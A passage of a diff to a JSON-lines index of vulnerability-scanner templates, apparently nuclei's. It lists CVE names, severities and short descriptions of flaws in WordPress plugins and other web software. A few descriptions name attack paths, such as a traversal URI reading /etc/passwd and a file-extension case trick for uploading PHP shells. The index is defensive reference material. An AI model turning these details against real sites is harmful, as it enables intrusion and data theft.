template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-16159.yaml"} {"ID":"CVE-2018-16167","Info":{"Name":"LogonTracer \u003c=1.2.0 - Remote Command Injection","Severity":"critical","Description":"LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-16167.yaml"} {"ID":"CVE-2018-16283","Info":{"Name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","Severity":"critical","Description":"WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-16283.yaml"} {"ID":"CVE-2018-16288","Info":{"Name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","Severity":"high","Description":"LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2018/CVE-2018-16288.yaml"} @@ -980,9 +986,12 @@ {"ID":"CVE-2021-22911","Info":{"Name":"Rocket.Chat \u003c=3.13 - NoSQL Injection","Severity":"critical","Description":"Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-22911.yaml"} {"ID":"CVE-2021-22986","Info":{"Name":"F5 BIG-IP iControl REST unauthenticated RCE","Severity":"critical","Description":"The iControl REST interface has an unauthenticated remote command execution vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-22986.yaml"} {"ID":"CVE-2021-23241","Info":{"Name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","Severity":"medium","Description":"MERCUSYS Mercury X18G 1.0.5 devices are vulnerable to local file inclusion via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-23241.yaml"} +{"ID":"CVE-2021-24145","Info":{"Name":"Modern Events Calendar Lite \u003c 5.16.5 - Arbitrary File Upload to RCE","Severity":"high","Description":"Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2021/CVE-2021-24145.yaml"} {"ID":"CVE-2021-24146","Info":{"Name":"WordPress Modern Events Calendar Lite \u003c5.16.5 - Sensitive Information Disclosure","Severity":"high","Description":"WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24146.yaml"} {"ID":"CVE-2021-24150","Info":{"Name":"Like Button Rating \u003c 2.6.32 - Unauthenticated Full-Read SSRF","Severity":"high","Description":"The LikeBtn WordPress plugin was vulnerable to Unauthenticated Full-Read Server-Side Request Forgery (SSRF).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24150.yaml"} +{"ID":"CVE-2021-24155","Info":{"Name":"Backup Guard \u003c 1.6.0 - Authenticated Arbitrary File Upload","Severity":"high","Description":"The WordPress Backup and Migrate Plugin – Backup Guard WordPress plugin before 1.6.0 did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2021/CVE-2021-24155.yaml"} {"ID":"CVE-2021-24165","Info":{"Name":"WordPress Ninja Forms \u003c3.4.34 - Open Redirect","Severity":"medium","Description":"WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24165.yaml"} +{"ID":"CVE-2021-24169","Info":{"Name":"Advanced Order Export For WooCommerce \u003c 3.1.8 - Authenticated Reflected Cross-Site Scripting (XSS)","Severity":"medium","Description":"This Advanced Order Export For WooCommerce WordPress plugin before 3.1.8 helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to reflected XSS.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2021/CVE-2021-24169.yaml"} {"ID":"CVE-2021-24176","Info":{"Name":"WordPress JH 404 Logger \u003c=1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code.","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2021/CVE-2021-24176.yaml"} {"ID":"CVE-2021-24210","Info":{"Name":"WordPress PhastPress \u003c1.111 - Open Redirect","Severity":"medium","Description":"WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24210.yaml"} {"ID":"CVE-2021-24214","Info":{"Name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24214.yaml"} @@ -998,6 +1007,7 @@ {"ID":"CVE-2021-24278","Info":{"Name":"WordPress Contact Form 7 \u003c2.3.4 - Arbitrary Nonce Generation","Severity":"high","Description":"WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24278.yaml"} {"ID":"CVE-2021-24284","Info":{"Name":"WordPress Kaswara Modern VC Addons \u003c=3.0.1 - Arbitrary File Upload","Severity":"critical","Description":"WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24284.yaml"} {"ID":"CVE-2021-24285","Info":{"Name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","Severity":"critical","Description":"The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24285.yaml"} +{"ID":"CVE-2021-24287","Info":{"Name":"Select All Categories and Taxonomies \u003c 1.3.2 - Reflected Cross-Site Scripting (XSS)","Severity":"medium","Description":"The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2021/CVE-2021-24287.yaml"} {"ID":"CVE-2021-24288","Info":{"Name":"WordPress AcyMailing \u003c7.5.0 - Open Redirect","Severity":"medium","Description":"WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24288.yaml"} {"ID":"CVE-2021-24291","Info":{"Name":"WordPress Photo Gallery by 10Web \u003c1.5.69 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Photo Gallery by 10Web plugin before 1.5.69 contains multiple reflected cross-site scripting vulnerabilities via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action, available to both unauthenticated and authenticated users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24291.yaml"} {"ID":"CVE-2021-24298","Info":{"Name":"WordPress Simple Giveaways \u003c2.36.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Simple Giveaways plugin before 2.36.2 contains a cross-site scripting vulnerability via the method and share GET parameters of the Giveaway pages, which are not sanitized, validated, or escaped before being output back in the pages.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24298.yaml"} @@ -1007,6 +1017,7 @@ {"ID":"CVE-2021-24335","Info":{"Name":"WordPress Car Repair Services \u0026 Auto Mechanic Theme \u003c4.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Car Repair Services \u0026 Auto Mechanic before 4.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the serviceestimatekey parameter before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24335.yaml"} {"ID":"CVE-2021-24340","Info":{"Name":"WordPress Statistics \u003c13.0.8 - Blind SQL Injection","Severity":"high","Description":"WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24340.yaml"} {"ID":"CVE-2021-24342","Info":{"Name":"WordPress JNews Theme \u003c8.0.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24342.yaml"} +{"ID":"CVE-2021-24347","Info":{"Name":"SP Project \u0026 Document Manager \u003c 4.22 - Authenticated Shell Upload","Severity":"high","Description":"The SP Project \u0026 Document Manager WordPress plugin before 4.22 allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension's case, for example, from \"php\" to \"pHP\".\n","Classification":{"CVSSScore":"8.3"}},"file_path":"cves/2021/CVE-2021-24347.yaml"} {"ID":"CVE-2021-24358","Info":{"Name":"Plus Addons for Elementor Page Builder \u003c 4.1.10 - Open Redirect","Severity":"medium","Description":"WordPress Plus Addons for Elementor Page Builder before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an open redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24358.yaml"} {"ID":"CVE-2021-24364","Info":{"Name":"WordPress Jannah Theme \u003c5.4.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24364.yaml"} {"ID":"CVE-2021-24370","Info":{"Name":"WordPress Fancy Product Designer \u003c4.6.9 - Arbitrary File Upload","Severity":"critical","Description":"WordPress Fancy Product Designer plugin before 4.6.9 is susceptible to an arbitrary file upload. An attacker can upload malicious files and execute code on the server, modify data, and/or gain full control over a compromised system without authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24370.yaml"} @@ -1020,15 +1031,18 @@ {"ID":"CVE-2021-24498","Info":{"Name":"WordPress Calendar Event Multi View \u003c1.4.01 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php).","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24498.yaml"} {"ID":"CVE-2021-24499","Info":{"Name":"WordPress Workreap - Remote Code Execution","Severity":"critical","Description":"WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24499.yaml"} {"ID":"CVE-2021-24510","Info":{"Name":"WordPress MF Gig Calendar \u003c=1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24510.yaml"} +{"ID":"CVE-2021-24554","Info":{"Name":"Paytm - Donation Plugin \u003c= 1.3.2 - Authenticated (admin+) SQL Injection","Severity":"high","Description":"The Paytm Donation Plugin WordPress plugin through 1.3.2 does not sanitise, validate or escape the id GET parameter before using it in a SQL statement when deleting donations, leading to an authenticated SQL injection issue.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2021/CVE-2021-24554.yaml"} {"ID":"CVE-2021-24746","Info":{"Name":"WordPress Sassy Social Share Plugin \u003c3.3.40 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin Sassy Social Share \u003c 3.3.40 contains a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24746.yaml"} {"ID":"CVE-2021-24750","Info":{"Name":"WordPress Visitor Statistics (Real Time Traffic) \u003c4.8 -SQL Injection","Severity":"high","Description":"WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-24750.yaml"} {"ID":"CVE-2021-24762","Info":{"Name":"WordPress Perfect Survey\u003c1.5.2 - SQL Injection","Severity":"critical","Description":"Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24762.yaml"} {"ID":"CVE-2021-24827","Info":{"Name":"WordPress Asgaros Forum \u003c1.15.13 - SQL Injection","Severity":"critical","Description":"WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24827.yaml"} {"ID":"CVE-2021-24838","Info":{"Name":"WordPress AnyComment \u003c0.3.5 - Open Redirect","Severity":"medium","Description":"WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24838.yaml"} +{"ID":"CVE-2021-24875","Info":{"Name":"eCommerce Product Catalog for WordPress \u003c 3.0.39 - Reflected Cross-Site Scripting","Severity":"medium","Description":"The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute, leading to a Reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24875.yaml"} {"ID":"CVE-2021-24891","Info":{"Name":"WordPress Elementor Website Builder \u003c3.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24891.yaml"} {"ID":"CVE-2021-24910","Info":{"Name":"WordPress Transposh Translation \u003c1.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24910.yaml"} {"ID":"CVE-2021-24917","Info":{"Name":"WPS Hide Login \u003c 1.9.1 - Protection Bypass with Referer-Header","Severity":"high","Description":"The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-24917.yaml"} {"ID":"CVE-2021-24926","Info":{"Name":"WordPress Domain Check \u003c1.0.17 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24926.yaml"} +{"ID":"CVE-2021-24931","Info":{"Name":"Secure Copy Content Protection and Content Locking \u003c 2.8.2 - Unauthenticated SQL Injection","Severity":"critical","Description":"The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24931.yaml"} {"ID":"CVE-2021-24940","Info":{"Name":"WordPress Persian Woocommerce \u003c=5.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24940.yaml"} {"ID":"CVE-2021-24946","Info":{"Name":"WordPress Modern Events Calendar \u003c6.1.5 - Blind SQL Injection","Severity":"critical","Description":"WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-24946.yaml"} {"ID":"CVE-2021-24947","Info":{"Name":"WordPress Responsive Vector Maps \u003c 6.4.2 - Arbitrary File Read","Severity":"medium","Description":"WordPress Responsive Vector Maps \u003c 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-24947.yaml"} @@ -1042,6 +1056,7 @@ {"ID":"CVE-2021-25052","Info":{"Name":"WordPress Button Generator \u003c2.3.3 - Remote File Inclusion","Severity":"high","Description":"WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-25052.yaml"} {"ID":"CVE-2021-25055","Info":{"Name":"WordPress FeedWordPress \u003c 2022.0123 - Authenticated Cross-Site Scripting","Severity":"medium","Description":"The plugin is affected by a cross-site scripting vulnerability within the \"visibility\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25055.yaml"} {"ID":"CVE-2021-25063","Info":{"Name":"WordPress Contact Form 7 Skins \u003c=2.5.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25063.yaml"} +{"ID":"CVE-2021-25067","Info":{"Name":"Landing Page Builder \u003c 1.4.9.6 - Cross-Site Scripting","Severity":"medium","Description":"The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2021/CVE-2021-25067.yaml"} {"ID":"CVE-2021-25074","Info":{"Name":"WordPress WebP Converter for Media \u003c 4.0.3 - Unauthenticated Open Redirect","Severity":"medium","Description":"WordPress WebP Converter for Media \u003c 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25074.yaml"} {"ID":"CVE-2021-25075","Info":{"Name":"WordPress Duplicate Page or Post \u003c1.5.1 - Cross-Site Scripting","Severity":"low","Description":"WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.\n","Classification":{"CVSSScore":"3.5"}},"file_path":"cves/2021/CVE-2021-25075.yaml"} {"ID":"CVE-2021-25085","Info":{"Name":"WOOF WordPress plugin - Cross-Site Scripting","Severity":"medium","Description":"The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25085.yaml"} @@ -1078,6 +1093,7 @@ {"ID":"CVE-2021-27330","Info":{"Name":"Triconsole Datepicker Calendar \u003c3.77 - Cross-Site Scripting","Severity":"medium","Description":"Triconsole Datepicker Calendar before 3.77 contains a cross-site scripting vulnerability in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-27330.yaml"} {"ID":"CVE-2021-27358","Info":{"Name":"Grafana Unauthenticated Snapshot Creation","Severity":"high","Description":"Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-27358.yaml"} {"ID":"CVE-2021-27519","Info":{"Name":"FUDForum 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the \"srch\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-27519.yaml"} +{"ID":"CVE-2021-27520","Info":{"Name":"FUDForum 3.1.0 - Cross Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the \"author\" parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2021/CVE-2021-27520.yaml"} {"ID":"CVE-2021-27561","Info":{"Name":"YeaLink DM 3.6.0.20 - Remote Command Injection","Severity":"critical","Description":"Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-27561.yaml"} {"ID":"CVE-2021-27651","Info":{"Name":"Pega Infinity - Authentication Bypass","Severity":"critical","Description":"Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass vulnerability because the password reset functionality for local accounts can be used to bypass local authentication checks.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-27651.yaml"} {"ID":"CVE-2021-27748","Info":{"Name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","Severity":"high","Description":"IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2021/CVE-2021-27748.yaml"} @@ -1328,7 +1344,9 @@ {"ID":"CVE-2022-0678","Info":{"Name":"Packagist \u003c1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0678.yaml"} {"ID":"CVE-2022-0679","Info":{"Name":"WordPress Narnoo Distributor \u003c=2.5.1 - Local File Inclusion","Severity":"critical","Description":"WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0679.yaml"} {"ID":"CVE-2022-0692","Info":{"Name":"Rudloff alltube prior to 3.0.1 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0692.yaml"} +{"ID":"CVE-2022-0693","Info":{"Name":"Master Elements \u003c= 8.0 - Unauthenticated SQLi","Severity":"critical","Description":"The Master Elements WordPress plugin through 8.0 does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL Injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0693.yaml"} {"ID":"CVE-2022-0735","Info":{"Name":"GitLab CE/EE - Runner Registration Token Disclosure","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.10 before 14.6.5, all versions starting from 14.7 before 14.7.4, all versions starting from 14.8 before 14.8.2. An unauthorised user was able to steal runner registration tokens through an information disclosure vulnerability using quick actions commands.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0735.yaml"} +{"ID":"CVE-2022-0760","Info":{"Name":"Simple Link Directory \u003c 7.7.2 - Unauthenticated SQL injection","Severity":"critical","Description":"The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL Injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0760.yaml"} {"ID":"CVE-2022-0776","Info":{"Name":"RevealJS postMessage \u003c4.3.0 - Cross-Site Scripting","Severity":"high","Description":"RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model.","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-0776.yaml"} {"ID":"CVE-2022-0781","Info":{"Name":"WordPress Nirweb Support \u003c2.8.2 - SQL Injection","Severity":"critical","Description":"WordPress Nirweb support plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0781.yaml"} {"ID":"CVE-2022-0784","Info":{"Name":"WordPress Title Experiments Free \u003c9.0.1 - SQL Injection","Severity":"critical","Description":"WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0784.yaml"} @@ -1343,11 +1361,13 @@ {"ID":"CVE-2022-0885","Info":{"Name":"Member Hero \u003c= 1.0.9 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0885.yaml"} {"ID":"CVE-2022-0928","Info":{"Name":"Microweber \u003c 1.2.12 - Stored Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-0928.yaml"} {"ID":"CVE-2022-0948","Info":{"Name":"WordPress Order Listener for WooCommerce \u003c3.2.2 - SQL Injection","Severity":"critical","Description":"WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0948.yaml"} 